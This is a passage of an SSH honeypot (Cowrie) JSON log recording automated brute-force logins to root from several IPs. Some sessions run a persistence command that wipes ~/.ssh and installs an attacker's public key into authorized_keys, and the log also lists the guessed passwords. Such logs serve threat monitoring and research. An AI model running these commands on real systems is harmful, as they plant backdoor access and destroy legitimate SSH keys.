ffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:15:42.206230Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.login.success","username":"root","password":"123.com.cn","message":"login attempt [root/123.com.cn] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:15:42.924460Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:15:43.279504Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:15:43.280164Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:15:43.281231Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:15:43.452686Z","src_ip":"60.221.239.232","session":"d72d42c06cd0"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":51112,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f68b4458d3","protocol":"ssh","message":"New connection: 129.226.183.73:51112 (1.2.3.4:22) [session: f0f68b4458d3]","sensor":"my-vps","timestamp":"2025-08-24T21:16:39.026762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:16:39.030592Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:16:39.288125Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.login.success","username":"root","password":"Zc@123456","message":"login attempt [root/Zc@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:16:40.319409Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:16:40.895936Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:16:40.896597Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:16:40.897720Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:16:41.162883Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:16:41.738858Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:16:41.739651Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:16:41.997634Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:16:41.998562Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":52384,"dst_ip":"1.2.3.4","dst_port":22,"session":"46e9ab67d198","protocol":"ssh","message":"New connection: 129.226.183.73:52384 (1.2.3.4:22) [session: 46e9ab67d198]","sensor":"my-vps","timestamp":"2025-08-24T21:16:42.251914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:16:42.254887Z","src_ip":"129.226.183.73","session":"46e9ab67d198"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:16:42.518352Z","src_ip":"129.226.183.73","session":"46e9ab67d198"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:16:43.563065Z","src_ip":"129.226.183.73","session":"46e9ab67d198"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:16:44.826471Z","src_ip":"129.226.183.73","session":"46e9ab67d198"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":53474,"dst_ip":"1.2.3.4","dst_port":22,"session":"c3cae639b36e","protocol":"ssh","message":"New connection: 129.226.183.73:53474 (1.2.3.4:22) [session: c3cae639b36e]","sensor":"my-vps","timestamp":"2025-08-24T21:16:45.109061Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:16:45.113213Z","src_ip":"129.226.183.73","session":"c3cae639b36e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:16:45.395251Z","src_ip":"129.226.183.73","session":"c3cae639b36e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:16:46.514136Z","src_ip":"129.226.183.73","session":"c3cae639b36e"}
{"eventid":"cowrie.session.closed","duration":"7.8","message":"Connection lost after 7.8 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:16:46.793150Z","src_ip":"129.226.183.73","session":"f0f68b4458d3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:16:46.799438Z","src_ip":"129.226.183.73","session":"c3cae639b36e"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":48304,"dst_ip":"1.2.3.4","dst_port":22,"session":"908a3f352e71","protocol":"ssh","message":"New connection: 129.226.183.73:48304 (1.2.3.4:22) [session: 908a3f352e71]","sensor":"my-vps","timestamp":"2025-08-24T21:17:51.125906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:17:51.131110Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:17:51.409240Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r@123","message":"login attempt [root/1q2w3e4r@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:17:52.517154Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:17:53.096350Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:17:53.097054Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-24T21:17:53.098036Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:17:53.377762Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T21:17:54.028891Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-24T21:17:54.029603Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-24T21:17:54.308073Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:17:54.308977Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":49694,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b2f09e81078","protocol":"ssh","message":"New connection: 129.226.183.73:49694 (1.2.3.4:22) [session: 2b2f09e81078]","sensor":"my-vps","timestamp":"2025-08-24T21:17:54.562436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:17:54.572115Z","src_ip":"129.226.183.73","session":"2b2f09e81078"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:17:54.827563Z","src_ip":"129.226.183.73","session":"2b2f09e81078"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-24T21:17:55.864088Z","src_ip":"129.226.183.73","session":"2b2f09e81078"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:17:57.125008Z","src_ip":"129.226.183.73","session":"2b2f09e81078"}
{"eventid":"cowrie.session.connect","src_ip":"129.226.183.73","src_port":50794,"dst_ip":"1.2.3.4","dst_port":22,"session":"58849e9dc3b6","protocol":"ssh","message":"New connection: 129.226.183.73:50794 (1.2.3.4:22) [session: 58849e9dc3b6]","sensor":"my-vps","timestamp":"2025-08-24T21:17:57.389874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-24T21:17:57.390525Z","src_ip":"129.226.183.73","session":"58849e9dc3b6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-24T21:17:57.664876Z","src_ip":"129.226.183.73","session":"58849e9dc3b6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-24T21:17:58.784314Z","src_ip":"129.226.183.73","session":"58849e9dc3b6"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:17:59.061680Z","src_ip":"129.226.183.73","session":"58849e9dc3b6"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-24T21:17:59.064404Z","src_ip":"129.226.183.73","session":"908a3f352e71"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":39118,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fffb71a581f","protocol":"ssh","message":"New connection: 45.88.8.215:39118 (1.2.3.4:22) [session: 4fffb71a581f]","sensor":"my-vps","timestamp":"2025-08-24T21:18:24.283287Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T21:18:24.667997Z","src_ip":"45.88.8.215","session":"4fffb71a581f"}
